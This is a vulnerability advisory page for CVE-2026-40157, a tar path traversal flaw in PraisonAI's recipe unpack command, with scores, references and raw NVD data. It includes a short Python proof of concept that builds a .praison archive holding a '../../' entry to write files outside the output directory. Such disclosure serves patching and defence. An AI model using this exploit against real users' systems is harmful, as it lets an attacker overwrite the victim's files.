CVE-2026-40157

Description

PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack. This vulnerability is fixed in 4.5.128.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE

PraisonAI < 4.5.128

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import tarfile
import os

def create_malicious_tar():
    """
    Creates a malicious .praison tar archive demonstrating the path traversal.
    """
    output_filename = "malicious_exploit.praison"

    # The file name includes path traversal sequences to escape the directory
    malicious_file_name = "../../arbitrary_write.txt"

    try:
        with tarfile.open(output_filename, "w") as tar:
            # Create a TarInfo object for the malicious file
            info = tarfile.TarInfo(name=malicious_file_name)
            info.size = 0
            # Add the file to the archive
            tar.addfile(info)
        
        print(f"[+] Successfully created malicious archive: {output_filename}")
        print(f"[+] Archive contains path traversal: {malicious_file_name}")
        print(f"[+] Usage: praisonai recipe unpack {output_filename}")
    except Exception as e:
        print(f"[-] Error creating tar file: {e}")

if __name__ == "__main__":
    create_malicious_tar()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40157
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40157
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40157/
[4] VulDB https://vuldb.com/cve/CVE-2026-40157
[5] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c
[6] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40157", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:13.457", "lastModified": "2026-04-24T15:07:36.003", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack. This vulnerability is fixed in 4.5.128."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.128", "matchCriteriaId": "56CDE5F5-B03C-4C3A-9A92-F61C9DFDA9B1"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}